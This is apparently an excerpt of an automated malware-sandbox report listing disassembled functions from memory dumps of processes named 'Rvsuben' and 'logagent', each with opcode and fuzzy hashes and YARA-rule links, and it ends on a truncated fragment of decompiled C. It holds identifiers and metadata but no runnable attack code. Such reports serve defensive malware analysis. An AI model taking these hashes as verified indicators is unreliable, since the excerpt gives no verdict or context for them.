                                              Uniqueness Score: -1.00%

                                              Function 03A04280 Relevance: 7.6, Strings: 6, Instructions: 52COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB
                                              • API String ID: 0-1946087534
                                              • Opcode ID: 49c0f0b391d19f349e02e9f2c56fb70b40cc17bd774e3a9bba6874a2c6432575
                                              • Instruction ID: 8108339cefbbc9d6b834a11fdb4c32a80e454435011693ec6cb4595354a0431d
                                              • Opcode Fuzzy Hash: 49c0f0b391d19f349e02e9f2c56fb70b40cc17bd774e3a9bba6874a2c6432575
                                              • Instruction Fuzzy Hash: 50114F3870D3D08FC302E768FD245593F61DBC2344B9685B7D6819FAB2CA2D9C068B69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A04290 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB
                                              • API String ID: 0-1946087534
                                              • Opcode ID: 2c326c36f7bbbe1ab7dc1a18401f51691a215653b64790be304676c2f31f4d48
                                              • Instruction ID: df2f9919001062225fce05519a6ea81f14f8ce10e053d4595b33d395b8756d04
                                              • Opcode Fuzzy Hash: 2c326c36f7bbbe1ab7dc1a18401f51691a215653b64790be304676c2f31f4d48
                                              • Instruction Fuzzy Hash: 260171387143D08FC301EB69FD149593B61DBC2344F928576E641AFBA4CA3DAC018BAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A04298 Relevance: 7.5, Strings: 6, Instructions: 40COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB
                                              • API String ID: 0-1946087534
                                              • Opcode ID: 6fd12b719a069611c08f05fc5cef4058dbd502a7e538f6a9d758e29cfc43c754
                                              • Instruction ID: 7757ef52394d4a447d935e13e9563cb0bbc937e8dfff63351b6057ea0f5d6fc0
                                              • Opcode Fuzzy Hash: 6fd12b719a069611c08f05fc5cef4058dbd502a7e538f6a9d758e29cfc43c754
                                              • Instruction Fuzzy Hash: 4C014F387143908FC301EB69FD146193755DBC2344F918572E640AF7A4CB3DAC019BAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A0429C Relevance: 7.5, Strings: 6, Instructions: 38COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB
                                              • API String ID: 0-1946087534
                                              • Opcode ID: 5ac9cd13bf5a0d7c353f1ad60fb88523d8e3b6e0186170fe3c6cb28e1d9490a9
                                              • Instruction ID: 8c244c3c2cf64b5cd83de20fc0ffb803f159d35f943ec83b9023a88b59cd34d1
                                              • Opcode Fuzzy Hash: 5ac9cd13bf5a0d7c353f1ad60fb88523d8e3b6e0186170fe3c6cb28e1d9490a9
                                              • Instruction Fuzzy Hash: 8D01FB387142948BC300EBA9FD1461A3755E7C1354F918572E6406F7A4CB39AC019B9D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1C128 Relevance: 6.4, Strings: 5, Instructions: 107COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$0$@A$@A$LA
                                              • API String ID: 0-398044695
                                              • Opcode ID: bfff6e31fb21e93eba19946439935cca9fc66e6c14f834b703ac288f07bc62c6
                                              • Instruction ID: e79428a5945e25c183b8353183e1f96e0399a7d8790868308c2ef12249599d4b
                                              • Opcode Fuzzy Hash: bfff6e31fb21e93eba19946439935cca9fc66e6c14f834b703ac288f07bc62c6
                                              • Instruction Fuzzy Hash: 3E419C38B443499FCB01EFEDCA806AEFBB5AB48310F64446BD500AB351CA349E54CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Function 04B795D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 5 4b795d0-4b795dc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 699bdbba79002116afc520c03ce8c583288e704cbf017a5df170c84549717dd7
                                              • Instruction ID: ad061dd2e0d35910d28d69f892369b998742475e7608439c1caf688537b25e64
                                              • Opcode Fuzzy Hash: 699bdbba79002116afc520c03ce8c583288e704cbf017a5df170c84549717dd7
                                              • Instruction Fuzzy Hash: 979002A220200003610571598414A16400ED7F0245B51C06AE1005594DC565D8A1B565
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4 4b79540-4b7954c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e9dd46da3a98237732d12494cca41702f608ac019ccb387422e4db0ce59db785
                                              • Instruction ID: 13949c945b3d6db557ca2a40d0073df7f8c1db3e3149f6b7dfd304019b780f69
                                              • Opcode Fuzzy Hash: e9dd46da3a98237732d12494cca41702f608ac019ccb387422e4db0ce59db785
                                              • Instruction Fuzzy Hash: 08900266211000032105B5594704907004AD7E5395351C06AF1006554CD661D871A561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B796E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 7 4b796e0-4b796ec LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ec9250c42a93bcbe92f3d053e7b142b964b2e2041d190abffb1f858b47f99d76
                                              • Instruction ID: 19667e0e2f1f99f21217b69e2263c752c452439c585b9b7162324096843d72a8
                                              • Opcode Fuzzy Hash: ec9250c42a93bcbe92f3d053e7b142b964b2e2041d190abffb1f858b47f99d76
                                              • Instruction Fuzzy Hash: 9490027220108802F1107159C404B4A0009D7E0345F55C45AE441565CD86D5D8A1B561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 6 4b79660-4b7966c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 469548daab1ed725cd69050d85ad6b6969882a55b9ff7581fd1d57d702caca16
                                              • Instruction ID: dbb6df0b707b645887bea00c29f462308901208c6545c1d62d101db6cab9ee95
                                              • Opcode Fuzzy Hash: 469548daab1ed725cd69050d85ad6b6969882a55b9ff7581fd1d57d702caca16
                                              • Instruction Fuzzy Hash: 7190027220100802F18071598404A4A0009D7E1345F91C05EE0016658DCA55DA69BBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B797A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 10 4b797a0-4b797ac LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 58ad8a44d04975926aa46afc90440db3d9a8859db03e3718f5e1b35811bc2b5e
                                              • Instruction ID: d70f77b73723669d52c95d0c8705d4b72a4e5e899fc9c57453f539984a17cf8d
                                              • Opcode Fuzzy Hash: 58ad8a44d04975926aa46afc90440db3d9a8859db03e3718f5e1b35811bc2b5e
                                              • Instruction Fuzzy Hash: 8390026230100003F14071599418A064009E7F1345F51D05AE0405558CD955D866A662
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 9 4b79780-4b7978c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 18f0edc980854b9830024ccb12f38e13d4329c5e403b9109f1731769c7f41cc5
                                              • Instruction ID: 3556ae7776520ce2c1a1a999bf29caceaaafe251fc05fbad87a7219fca50ceb4
                                              • Opcode Fuzzy Hash: 18f0edc980854b9830024ccb12f38e13d4329c5e403b9109f1731769c7f41cc5
                                              • Instruction Fuzzy Hash: 5E90026A21300002F18071599408A0A0009D7E1246F91D45EE000655CCC955D879A761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 421ea1deb41c201aa760d55cc19f66dcf9d514c74fdefbe36c8ba259e5c6fdd1
                                              • Instruction ID: a1a38ed8286d40734e65377907d04c9987db98004c860002c95bf89bde7600f3
                                              • Opcode Fuzzy Hash: 421ea1deb41c201aa760d55cc19f66dcf9d514c74fdefbe36c8ba259e5c6fdd1
                                              • Instruction Fuzzy Hash: 9E90027231114402F1107159C404B060009D7E1245F51C45AE081555CD86D5D8A1B562
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 8 4b79710-4b7971c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cd19c23e0f4064b8851573a4325d73dd4e06536a63b1f080e2fd17d27deeb84e
                                              • Instruction ID: 3d368f248dfccf5efc21ef55edc379401aaf70d8016f3887c23ea81c4388e23e
                                              • Opcode Fuzzy Hash: cd19c23e0f4064b8851573a4325d73dd4e06536a63b1f080e2fd17d27deeb84e
                                              • Instruction Fuzzy Hash: 9890027220100402F10075999408A460009D7F0345F51D05AE5015559EC6A5D8A1B571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B798F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 13 4b798f0-4b798fc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6aa322d74e06ad1a966d38116624d4db439aca37e333f7c2af2b70b414d94788
                                              • Instruction ID: 1366e81f94fe03f827afdf77e282ce07b5f2f6dfcc3c69cfe9bda097cc29de50
                                              • Opcode Fuzzy Hash: 6aa322d74e06ad1a966d38116624d4db439aca37e333f7c2af2b70b414d94788
                                              • Instruction Fuzzy Hash: F290026260100502F10171598404A16000ED7E0285F91C06BE1015559ECA65D9A2F571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 12 4b79860-4b7986c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6d24611541562103527917afc490068ae26c0ccd15f8e820df3f5ea9796479cd
                                              • Instruction ID: bd4ce3816c5d99652c822445f99c16e290c4695e08968113b4233b535434ae69
                                              • Opcode Fuzzy Hash: 6d24611541562103527917afc490068ae26c0ccd15f8e820df3f5ea9796479cd
                                              • Instruction Fuzzy Hash: 2290027220100413F11171598504B07000DD7E0285F91C45BE041555CD9696D962F561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 11 4b79840-4b7984c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f7a57b16e74cf6c774d3a0c7e040b762bcca6a7b090b79beef99c74d058f9b60
                                              • Instruction ID: a5db940979a1a76228c6b31296196b5b2f9ee4c85fffd88cc49aa0d07e69ce3b
                                              • Opcode Fuzzy Hash: f7a57b16e74cf6c774d3a0c7e040b762bcca6a7b090b79beef99c74d058f9b60
                                              • Instruction Fuzzy Hash: 6C900262242041527545B1598404907400AE7F0285791C05BE1405954C8566E866EA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B799A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 15 4b799a0-4b799ac LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3d93cad58116df84f9b1de2422b937c2b584b5ad407820088c604887588536ab
                                              • Instruction ID: cd24a8340fa097018747006cb1fce77ca9c1bb2ea32717bfd5c172935c4d9089
                                              • Opcode Fuzzy Hash: 3d93cad58116df84f9b1de2422b937c2b584b5ad407820088c604887588536ab
                                              • Instruction Fuzzy Hash: 869002A234100442F10071598414F060009D7F1345F51C05EE1055558D8659DC62B566
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 14 4b79910-4b7991c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: df68127870d41f3fc72b85346807ec1dc9a6de8922804ccdd21096e0b5a46060
                                              • Instruction ID: 06c49a2685b3612c4f97c414be4de5809c158a7de30b544f0fd5af691a338a64
                                              • Opcode Fuzzy Hash: df68127870d41f3fc72b85346807ec1dc9a6de8922804ccdd21096e0b5a46060
                                              • Instruction Fuzzy Hash: 629002B220100402F14071598404B460009D7E0345F51C05AE5055558E8699DDE5BAA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 17 4b79a20-4b79a2c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8da241fab50686a88139d8aded3de483c0ca00b916344dbd16c08d3ba015ccc2
                                              • Instruction ID: 8268e58e94360c8d8adce895b99587da80e5041fc994cc5dfb712d8b20516a1a
                                              • Opcode Fuzzy Hash: 8da241fab50686a88139d8aded3de483c0ca00b916344dbd16c08d3ba015ccc2
                                              • Instruction Fuzzy Hash: 589002626010004261407169C844D064009FBF1255751C16AE0989554D8599D875AAA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 16 4b79a00-4b79a0c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 00bec3f502c4cecbc8bea0465305a2012859c179e56c46c46c4d2451b17927d3
                                              • Instruction ID: c37ba3e91a2789e45ffd6030640dd0dc0301d1928ce802437cf1ad85b6539d09
                                              • Opcode Fuzzy Hash: 00bec3f502c4cecbc8bea0465305a2012859c179e56c46c46c4d2451b17927d3
                                              • Instruction Fuzzy Hash: 8D90027220140402F10071598814B0B0009D7E0346F51C05AE1155559D8665D861B9B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B79A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 807c591407c8170649d61b56051640e933db41dff5ef289ae39d80d0fa717746
                                              • Instruction ID: d5498cc2f17c16089dd0d0ecbd55374a13c018eb5cba980de9ee752e04dd6cad
                                              • Opcode Fuzzy Hash: 807c591407c8170649d61b56051640e933db41dff5ef289ae39d80d0fa717746
                                              • Instruction Fuzzy Hash: 0190026221180042F20075698C14F070009D7E0347F51C15EE0145558CC955D871A961
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04B7967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4b7967a-4b7967f 1 4b79681-4b79688 0->1 2 4b7968f-4b79696 LdrInitializeThunk 0->2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c17b56a11caa1b848d25c4d961a83f13afb79d5ed2f3e422d19265ae77494def
                                              • Instruction ID: 2876152681d14327c19eecd38fedd4012ecb3c6344f4c12058b0025718538157
                                              • Opcode Fuzzy Hash: c17b56a11caa1b848d25c4d961a83f13afb79d5ed2f3e422d19265ae77494def
                                              • Instruction Fuzzy Hash: A3B09BB29014C5C5F711E7604608F177904F7E0745F16C196D1121645A4778D091F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 04BCFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E04BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
